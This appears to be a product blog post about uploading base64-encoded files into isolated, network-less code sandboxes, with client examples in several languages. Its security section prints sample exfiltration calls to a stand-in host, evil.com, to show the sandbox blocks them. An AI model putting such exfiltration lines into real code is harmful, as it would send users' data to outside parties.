File Teleportation: Securely Sending Data Into Zero-Trust Sandboxes

December 02, 2025

Ever wondered how to get data files into a zero-trust sandbox environment that has no network access, no filesystem persistence, and no shared storage? It's like trying to beam data into a black box that's already sealed shut.

Today we're introducing input file support - a feature that lets you "teleport" files directly into isolated execution environments. Here's how it works and why it matters.

The Challenge: Getting Data Into Isolation

Traditional code execution environments face a dilemma:

Option 1: Network Access ❌

  • Give code network access to download files
  • Security nightmare - code can exfiltrate data, make API calls, or launch DDoS attacks
  • Defeats the purpose of sandboxing

Option 2: Shared Filesystem ❌

  • Mount shared storage into containers
  • Persistence issues - data leaks between executions
  • Performance overhead - I/O becomes bottleneck
  • Security risk - containers can read each other's data

Option 3: Pre-installed Datasets ❌

  • Bake common datasets into container images
  • Inflexible - what if users need custom data?
  • Bloated images - GB-sized containers for every use case

None of these work for zero-trust sandboxes. We need something better.

The Solution: File Teleportation

Instead of giving code access to fetch files, we teleport files directly into the execution environment before code runs:

┌─────────────┐                    ┌──────────────────┐
│   Browser   │  HTTPS (TLS 1.3)   │  unsandbox API   │
│             │ ─────────────────> │                  │
│  Files →    │   Base64-encoded   │  Ephemeral       │
│  Base64     │   input_files[]    │  Container       │
└─────────────┘                    └──────────────────┘
                                            │
                                            ↓
                                   ┌──────────────────┐
                                   │  /tmp/input/     │
                                   │  ├─ data.csv     │
                                   │  ├─ config.json  │
                                   │  └─ image.png    │
                                   └──────────────────┘
                                            │
                                            ↓
                                   ┌──────────────────┐
                                   │  Your Code       │
                                   │  open('data.csv')│
                                   └──────────────────┘

Three-step process:

  1. Browser encodes files - HTML5 FileReader API reads local files as base64
  2. TLS-encrypted transfer - Files sent over HTTPS to unsandbox API
  3. Container materialization - Files appear in /tmp/input/ before code executes

Key insight: Files never touch a persistent filesystem. They're written directly into an ephemeral container that exists for ~150ms, then vanishes forever.

How It Works: The Technical Details

Step 1: Client-Side Encoding (Zero Server Uploads!)

Instead of traditional form uploads to a server, we use JavaScript to read files directly:

// User selects file
const fileInput = document.querySelector('input[type="file"]');
fileInput.addEventListener('change', async (e) => {
  const file = e.target.files[0];

  // Read file as base64 in browser
  const reader = new FileReader();
  reader.onload = (event) => {
    const base64 = event.target.result.split(',')[1]; // Remove data URI prefix

    // File is now in memory, ready to send
    sendToSandbox(file.name, base64);
  };
  reader.readAsDataURL(file);
});

Why base64?

  • JSON-safe encoding (API uses JSON payloads)
  • Text-based, works with any binary data
  • No special handling for different file types
  • ~33% size overhead is acceptable for <10MB limits

Security benefit: Files never hit your server. They go browser → API → container directly.
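
To make the ~33% figure above concrete, here is a quick, standalone sanity check of the base64 expansion (not part of the upload flow itself):

import base64

payload = b'x' * (5 * 1024 * 1024)          # a 5MB file, the per-file limit
encoded = base64.b64encode(payload)
print(len(encoded) / len(payload))           # ~1.33, i.e. roughly 33% larger on the wire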

Step 2: TLS-Encrypted Transfer

Files are sent as part of the execution request:

POST https://api.unsandbox.com/execute

{
  "language": "python",
  "code": "import pandas as pd\ndf = pd.read_csv('data.csv')\nprint(df.describe())",
  "input_files": [
    {
      "filename": "data.csv",
      "content": "bmFtZSxhZ2UKQWxpY2UsMzAKQm9iLDI1Cg=="
    }
  ]
}

TLS 1.3 encryption:

  • Perfect forward secrecy (PFS) - even if keys are compromised later, past traffic stays encrypted
  • 0-RTT resumption for returning clients (faster)
  • ChaCha20-Poly1305 or AES-256-GCM ciphers

What this means: Files are encrypted in transit with strong, modern ciphers. Even if someone intercepts the network traffic, they can't read the file contents.

Step 3: Container Materialization

When the API receives your request:

  1. Files decoded - Base64 → binary, written to /tmp/input/
  2. Working directory - Code execution starts with CWD=/tmp/input/
  3. Code runs - Your code can open('data.csv') directly
  4. Container destroyed - After execution, everything vanishes

Ephemeral by design: Files exist only during execution. No cleanup needed - the entire container filesystem is discarded.
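
For illustration, here is a minimal Python sketch of what the materialization step looks like conceptually. The function and argument names are ours, not the service's actual (non-public) implementation, which also enforces the size and filename limits described later:

import base64
import os

def materialize_input_files(input_files, input_dir='/tmp/input'):
    """Decode base64 input_files entries into the container's input directory."""
    os.makedirs(input_dir, exist_ok=True)
    for entry in input_files:
        # basename strips any path components so files cannot escape input_dir
        filename = os.path.basename(entry['filename'])
        data = base64.b64decode(entry['content'])
        with open(os.path.join(input_dir, filename), 'wb') as f:
            f.write(data)
    # Execution then starts with CWD=/tmp/input/, so code can open('data.csv') directly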

Complete Working Examples

Here are tested, working examples in Python, Ruby, C, and TypeScript showing how to read a local file, encode it as base64, and send it to the sandbox for processing.

Example 1: Python

#!/usr/bin/env python3
import base64
import requests

# Step 1: Read a local file from your filesystem
with open('data.csv', 'rb') as f:
    file_content = f.read()

# Step 2: Encode to base64
base64_content = base64.b64encode(file_content).decode('utf-8')

# Step 3: Send to unsandbox API
response = requests.post(
    'https://api.unsandbox.com/execute',
    headers={
        'Authorization': 'Bearer YOUR_API_KEY',
        'Content-Type': 'application/json'
    },
    json={
        'language': 'python',
        'code': '''
import csv
with open('data.csv') as f:
    reader = csv.DictReader(f)
    for row in reader:
        print(f"{row['name']}: {row['value']}")
''',
        'input_files': [
            {
                'filename': 'data.csv',
                'content': base64_content
            }
        ]
    },
    timeout=60
)

result = response.json()
print('Output:', result['stdout'])

Output:

Output: Alice: 100
Bob: 200
Charlie: 300

Example 2: Ruby

#!/usr/bin/env ruby
require 'base64'
require 'net/http'
require 'json'

# Step 1: Read file from filesystem
file_content = File.binread('data.csv')  # binread is safe for binary files too

# Step 2: Encode to base64
base64_content = Base64.strict_encode64(file_content)

# Step 3: Send to unsandbox API
uri = URI('https://api.unsandbox.com/execute')
request = Net::HTTP::Post.new(uri)
request['Authorization'] = 'Bearer YOUR_API_KEY'
request['Content-Type'] = 'application/json'
request.body = {
  language: 'ruby',
  code: 'require "csv"; CSV.foreach("data.csv", headers: true) { |row| puts "#{row["name"]}: #{row["value"]}" }',
  input_files: [{filename: 'data.csv', content: base64_content}]
}.to_json

response = Net::HTTP.start(uri.hostname, uri.port, use_ssl: true, read_timeout: 60) do |http|
  http.request(request)
end

result = JSON.parse(response.body)
puts "Output: #{result['stdout']}"

Output:

Output: Alice: 100
Bob: 200
Charlie: 300

Example 3: C with libcurl

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <stdint.h>  /* uint32_t used in base64_encode */
#include <curl/curl.h>

// Base64 encoding function
char* base64_encode(const unsigned char* input, int length) {
    static const char encoding_table[] = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/";
    int output_length = 4 * ((length + 2) / 3);
    char* encoded = malloc(output_length + 1);

    for (int i = 0, j = 0; i < length;) {
        uint32_t octet_a = i < length ? input[i++] : 0;
        uint32_t octet_b = i < length ? input[i++] : 0;
        uint32_t octet_c = i < length ? input[i++] : 0;
        uint32_t triple = (octet_a << 16) + (octet_b << 8) + octet_c;

        encoded[j++] = encoding_table[(triple >> 18) & 0x3F];
        encoded[j++] = encoding_table[(triple >> 12) & 0x3F];
        encoded[j++] = encoding_table[(triple >> 6) & 0x3F];
        encoded[j++] = encoding_table[triple & 0x3F];
    }

    int mod_table[] = {0, 2, 1};
    for (int i = 0; i < mod_table[length % 3]; i++)
        encoded[output_length - 1 - i] = '=';

    encoded[output_length] = '\0';
    return encoded;
}

int main() {
    // Step 1: Read file from filesystem
    FILE* file = fopen("data.csv", "rb");
    if (!file) {
        perror("data.csv");
        return 1;
    }
    fseek(file, 0, SEEK_END);
    long file_size = ftell(file);
    fseek(file, 0, SEEK_SET);

    unsigned char* file_content = malloc(file_size);
    fread(file_content, 1, file_size, file);
    fclose(file);

    // Step 2: Encode to base64
    char* base64_content = base64_encode(file_content, file_size);

    // Step 3: Build JSON payload (buffer sized for this small example file;
    // inner quotes of the embedded C code must reach the API as \" in the JSON)
    char* json_payload = malloc(8192);
    snprintf(json_payload, 8192,
        "{"
        "\"language\":\"c\","
        "\"code\":\"#include <stdio.h>\\n#include <string.h>\\nint main() { FILE* f = fopen(\\\"data.csv\\\", \\\"r\\\"); char line[256]; fgets(line, 256, f); while(fgets(line, 256, f)) { char* name = strtok(line, \\\",\\\"); char* value = strtok(NULL, \\\",\\\"); printf(\\\"%%s: %%s\\\", name, value); } return 0; }\","
        "\"input_files\":[{\"filename\":\"data.csv\",\"content\":\"%s\"}]"
        "}", base64_content);

    // Step 4: Send via libcurl
    CURL* curl = curl_easy_init();
    struct curl_slist* headers = NULL;
    headers = curl_slist_append(headers, "Authorization: Bearer YOUR_API_KEY");
    headers = curl_slist_append(headers, "Content-Type: application/json");

    curl_easy_setopt(curl, CURLOPT_URL, "https://api.unsandbox.com/execute");
    curl_easy_setopt(curl, CURLOPT_HTTPHEADER, headers);
    curl_easy_setopt(curl, CURLOPT_POSTFIELDS, json_payload);
    curl_easy_setopt(curl, CURLOPT_TIMEOUT, 60L);

    CURLcode res = curl_easy_perform(curl);

    curl_slist_free_all(headers);
    curl_easy_cleanup(curl);
    free(file_content);
    free(base64_content);
    free(json_payload);

    return 0;
}

Compile and run:

gcc -o file_upload file_upload.c -lcurl
./file_upload

Example 4: TypeScript/Node.js

import * as fs from 'fs';
import * as https from 'https';

// Step 1: Read file from filesystem
const fileContent: Buffer = fs.readFileSync('data.csv');

// Step 2: Encode to base64
const base64Content: string = fileContent.toString('base64');

// Step 3: Build request payload
const data: string = JSON.stringify({
  language: 'javascript',
  code: `
const fs = require('fs');
const lines = fs.readFileSync('data.csv', 'utf8').trim().split('\\n');
const headers = lines[0].split(',');
for (let i = 1; i < lines.length; i++) {
  const values = lines[i].split(',');
  console.log(values[0] + ': ' + values[1]);
}
  `.trim(),
  input_files: [{
    filename: 'data.csv',
    content: base64Content
  }]
});

// Step 4: Send to unsandbox API
const options: https.RequestOptions = {
  hostname: 'api.unsandbox.com',
  path: '/execute',
  method: 'POST',
  headers: {
    'Authorization': 'Bearer YOUR_API_KEY',
    'Content-Type': 'application/json',
    'Content-Length': Buffer.byteLength(data)
  },
  timeout: 60000
};

const req = https.request(options, (res) => {
  let body = '';
  res.on('data', (chunk) => body += chunk);
  res.on('end', () => {
    const result = JSON.parse(body);
    console.log('Output:', result.stdout);
  });
});

req.on('error', (e) => console.error('Error:', e.message));
req.write(data);
req.end();

Run with:

npx ts-node file_upload.ts
# Or compile first:
tsc file_upload.ts && node file_upload.js

Output:

Output: Alice: 100
Bob: 200
Charlie: 300

What All Examples Do

  1. Read file - Load data.csv from your local filesystem
  2. Encode base64 - Convert binary file content to base64 string
  3. Build JSON - Create API request with code + input_files array
  4. POST via HTTPS - Send to api.unsandbox.com with TLS encryption
  5. Parse results - Extract stdout from response

Key insight: All four languages follow the same pattern - file teleportation works identically regardless of your client language!

Real-World Example: Data Analysis Pipeline

Let's process a CSV file without ever storing it on a server:

Browser Code (Frontend)

<input type="file" id="csvFile" accept=".csv">
<button onclick="analyzeData()">Analyze CSV</button>
<pre id="output"></pre>

<script>
async function analyzeData() {
  const file = document.getElementById('csvFile').files[0];

  // Read file as base64
  const base64 = await new Promise((resolve) => {
    const reader = new FileReader();
    reader.onload = (e) => resolve(e.target.result.split(',')[1]);
    reader.readAsDataURL(file);
  });

  // Send to unsandbox
  const response = await fetch('https://api.unsandbox.com/execute', {
    method: 'POST',
    headers: {
      'Authorization': 'Bearer YOUR_API_KEY',
      'Content-Type': 'application/json'
    },
    body: JSON.stringify({
      language: 'python',
      code: `
import pandas as pd
df = pd.read_csv('data.csv')
print('Rows:', len(df))
print('Columns:', df.columns.tolist())
print('\\nSummary Statistics:')
print(df.describe())
      `.trim(),
      input_files: [{
        filename: 'data.csv',
        content: base64
      }]
    })
  });

  const result = await response.json();
  document.getElementById('output').textContent = result.stdout;
}
</script>

What Actually Happens

  1. User selects sales_data.csv (2MB) from their computer
  2. JavaScript reads file into memory as base64 (~2.7MB)
  3. HTTPS POST sends to api.unsandbox.com (TLS-encrypted)
  4. Container spawns with sales_data.csv in /tmp/input/
  5. Pandas processes the data
  6. Results returned as stdout
  7. Container deleted - original file and all processed data vanish

Total time: ~1.2 seconds (800ms for pandas import + 400ms for processing)

Data exposure: Zero. The file never touched a server disk, never persisted, and was never accessible to other executions.

Security Benefits

1. Zero Data Persistence

Traditional upload flow:

Browser → Server (disk write) → Process → Delete (maybe?)
          ↑
          Data lingers in:
          - /tmp files
          - Log files
          - Backups
          - OS page cache

Teleportation flow:

Browser → Memory → Container (tmpfs) → Execution → Destroy
                   ↑
                   Ephemeral - never hits disk

Benefit: Even if the host machine is compromised, there's no persistent data to steal.

2. Isolated Per-Execution

Each execution gets its own private /tmp/input/ directory. Containers can't see each other's files - enforced by kernel-level isolation.

# Execution 1
open('secrets.txt').read()  # Works

# Execution 2 (different container)
open('secrets.txt').read()  # FileNotFoundError - can't see Execution 1's files

3. TLS All The Way

File bytes are encrypted from the moment they leave your browser until they're written into the container. No plaintext intermediate steps.

Certificate pinning (optional): Verify the API server's TLS certificate to prevent man-in-the-middle attacks.
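
The API does not require pinning, but a cautious client can refuse to send files if the live certificate differs from a fingerprint recorded out of band. A minimal Python sketch, with a placeholder fingerprint:

import hashlib
import socket
import ssl

PINNED_SHA256 = 'replace-with-a-fingerprint-recorded-out-of-band'

def verify_pin(host='api.unsandbox.com', port=443):
    # Fetch the server's leaf certificate and compare its SHA-256 fingerprint
    ctx = ssl.create_default_context()
    with socket.create_connection((host, port)) as sock:
        with ctx.wrap_socket(sock, server_hostname=host) as tls:
            der_cert = tls.getpeercert(binary_form=True)
    fingerprint = hashlib.sha256(der_cert).hexdigest()
    if fingerprint != PINNED_SHA256:
        raise RuntimeError('TLS certificate fingerprint mismatch - aborting upload')

verify_pin()  # call before sending any input_files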

4. No Network Access For Code

Your code runs in a sandbox with zero network access. Even if malicious code tries to exfiltrate the data you uploaded, it has no way out:

# All of these fail
import requests
requests.get('https://evil.com/exfil?data=' + secret)  # Network disabled

import socket
socket.socket().connect(('evil.com', 80))  # Network disabled

import subprocess
subprocess.run(['curl', 'evil.com'])  # curl not installed, network disabled anyway

Use Cases

1. AI/ML Data Processing

Upload training data, run inference, get results - without storing sensitive data:

# User uploads medical_records.csv (HIPAA-sensitive)
# Code runs in sandbox:
import pandas as pd
from sklearn.ensemble import RandomForestClassifier

df = pd.read_csv('medical_records.csv')
X = df.drop('diagnosis', axis=1)
y = df['diagnosis']

model = RandomForestClassifier()
model.fit(X, y)
print(f'Accuracy: {model.score(X, y):.2%}')

Compliance benefit: Data never persists, meeting GDPR/HIPAA requirements for data minimization.

2. Financial Analysis

Process bank statements without cloud storage:

import pandas as pd

# User uploads transactions.csv
df = pd.read_csv('transactions.csv', parse_dates=['date'])
df['month'] = df['date'].dt.to_period('M')
monthly = df.groupby('month')['amount'].sum()
print(monthly.to_string())

3. Image Processing

Transform images without server-side storage:

from PIL import Image
import io
import base64

# User uploads photo.jpg
img = Image.open('photo.jpg')
img_resized = img.resize((800, 600))
img_grayscale = img_resized.convert('L')

# Return as base64
buffer = io.BytesIO()
img_grayscale.save(buffer, format='JPEG')
print(base64.b64encode(buffer.getvalue()).decode())

4. Configuration Validation

Test config files safely:

import json

# User uploads config.json
with open('config.json') as f:
    config = json.load(f)

# Validate schema
required_keys = ['api_key', 'endpoint', 'timeout']
missing = [k for k in required_keys if k not in config]

if missing:
    print(f'ERROR: Missing keys: {missing}')
else:
    print('✓ Configuration valid')

Limits and Specifications

File constraints:

  • Maximum 10 files per execution
  • Maximum 5MB per file (decoded)
  • Maximum 10MB total (decoded)
  • Base64-encoded before sending (~33% overhead)

Filename rules:

  • 256 characters max
  • No path components (/, .., etc.)
  • Files accessible by name: open('data.csv')
  • Files accessible by index: open('0'), open('1')
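
A client can enforce these limits before sending anything. Here is a rough Python sketch (the helper name is ours, and the server performs its own validation regardless):

import base64
import os

MAX_FILES = 10
MAX_FILE_BYTES = 5 * 1024 * 1024       # 5MB per file (decoded)
MAX_TOTAL_BYTES = 10 * 1024 * 1024     # 10MB total (decoded)

def build_input_files(paths):
    """Validate the documented limits client-side and build the input_files[] payload."""
    if len(paths) > MAX_FILES:
        raise ValueError(f'at most {MAX_FILES} files per execution')
    entries, total = [], 0
    for path in paths:
        name = os.path.basename(path)   # strip path components before sending
        if len(name) > 256:
            raise ValueError(f'filename too long: {name!r}')
        with open(path, 'rb') as f:
            data = f.read()
        if len(data) > MAX_FILE_BYTES:
            raise ValueError(f'{name} exceeds the 5MB per-file limit')
        total += len(data)
        entries.append({'filename': name,
                        'content': base64.b64encode(data).decode()})
    if total > MAX_TOTAL_BYTES:
        raise ValueError('total decoded size exceeds the 10MB limit')
    return entries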

MIME type detection: If the filename is omitted, the file type is detected automatically from magic bytes:

  • PNG: 89 50 4E 47 → 0.png
  • JPEG: FF D8 FF → 0.jpg
  • PDF: 25 50 44 46 → 0.pdf
  • ZIP: 50 4B 03 04 → 0.zip
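
For intuition, a tiny Python sketch of how such magic-byte sniffing can work (the service's exact detection rules are not published, so treat this as illustrative):

MAGIC_BYTES = {
    b'\x89PNG':      '0.png',
    b'\xff\xd8\xff': '0.jpg',
    b'%PDF':         '0.pdf',
    b'PK\x03\x04':   '0.zip',
}

def guess_filename(data: bytes, default='0.bin'):
    # Compare the file's leading bytes against well-known signatures
    for magic, name in MAGIC_BYTES.items():
        if data.startswith(magic):
            return name
    return default

print(guess_filename(b'\x89PNG\r\n\x1a\n...'))  # -> 0.png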

Performance

File materialization overhead:

  • Decode base64: ~50ms for 5MB file
  • Write to tmpfs: ~10ms (RAM-backed, not disk)
  • Total overhead: ~60ms even at the 5MB per-file limit

Memory usage: Files are written to tmpfs (RAM), counted against container memory limit (typically 512MB-2GB depending on your plan).

Try It Yourself

Live Demo

Visit unsandbox.com and try the file upload feature:

  1. Write code that reads a file:

    import csv
    with open('data.csv') as f:
        for row in csv.DictReader(f):
            print(row)
  2. Click "Choose Files" and upload a CSV

  3. Hit "Execute Code" - your file is teleported into the sandbox!

API Example

# Create a test file (printf expands \n into real newlines; plain echo may not)
printf "name,age\nAlice,30\nBob,25\n" > data.csv

# Encode to base64
BASE64=$(base64 -w 0 data.csv)  # -w 0 disables line wrapping (GNU coreutils)

# Execute with file
curl https://api.unsandbox.com/execute \
  -H "Authorization: Bearer YOUR_KEY" \
  -H "Content-Type: application/json" \
  -d "{
    \"language\": \"python\",
    \"code\": \"import csv\\nfor row in csv.DictReader(open('data.csv')): print(row)\",
    \"input_files\": [{\"filename\": \"data.csv\", \"content\": \"$BASE64\"}]
  }"

Comparison: Traditional vs Teleportation

Aspect          Traditional Upload                        File Teleportation
--------------  ----------------------------------------  ----------------------------
Data path       Browser → Your Server → Processing        Browser → Sandbox directly
Persistence     Files stored on disk                      Zero persistence
Security        You manage storage, cleanup, encryption   Built-in ephemeral security
Isolation       Must implement yourself                   Automatic per-execution
Compliance      Complex (data retention policies)         Simple (data never persists)
Performance     Disk I/O overhead                         RAM-only (faster)
Infrastructure  Need storage service                      Zero infrastructure

Under The Hood: Kernel Isolation

When you send files:

  1. Separate network namespace - Container has no network access
  2. Separate PID namespace - Can't see other processes
  3. Separate mount namespace - /tmp/input/ is private to this container
  4. Read-only root filesystem - Code can't modify container image
  5. Seccomp-BPF filters - System calls restricted to safe subset

Result: Even if your code (or malicious code) tries to escape, it's trapped inside a sandboxed kernel with no way out.
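
To give a feel for what those layers map to in practice, here is a rough Python sketch that launches a throwaway container with broadly equivalent Docker flags. unsandbox's actual runtime and seccomp profile are not public; the image name and profile path below are placeholders:

import subprocess

subprocess.run([
    'docker', 'run', '--rm',
    '--network=none',                          # separate network namespace, no network access
    '--pids-limit=64',                         # bounded, separate PID namespace
    '--read-only',                             # read-only root filesystem
    '--tmpfs', '/tmp/input:rw,size=16m',       # ephemeral RAM-backed input directory
    '--security-opt', 'seccomp=profile.json',  # restrict syscalls to an allowed subset
    'python:3.12-slim',
    'python', '-c', "print('running inside an isolated container')",
], check=True)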

Conclusion

File teleportation solves a fundamental problem in zero-trust computing: how to get data into isolation without compromising security.

By combining TLS encryption, base64 encoding, and ephemeral containers, we've created a system where:

✅ Files are encrypted in transit
✅ Files never persist on servers
✅ Each execution is completely isolated
✅ Code has zero network access
✅ Everything vanishes after execution

It's like having a secure courier that hand-delivers your data into a vault, watches you process it, then burns the vault to the ground - all in 150 milliseconds.

Try it now: unsandbox.com - Upload a file and watch it teleport into the sandbox! 🚀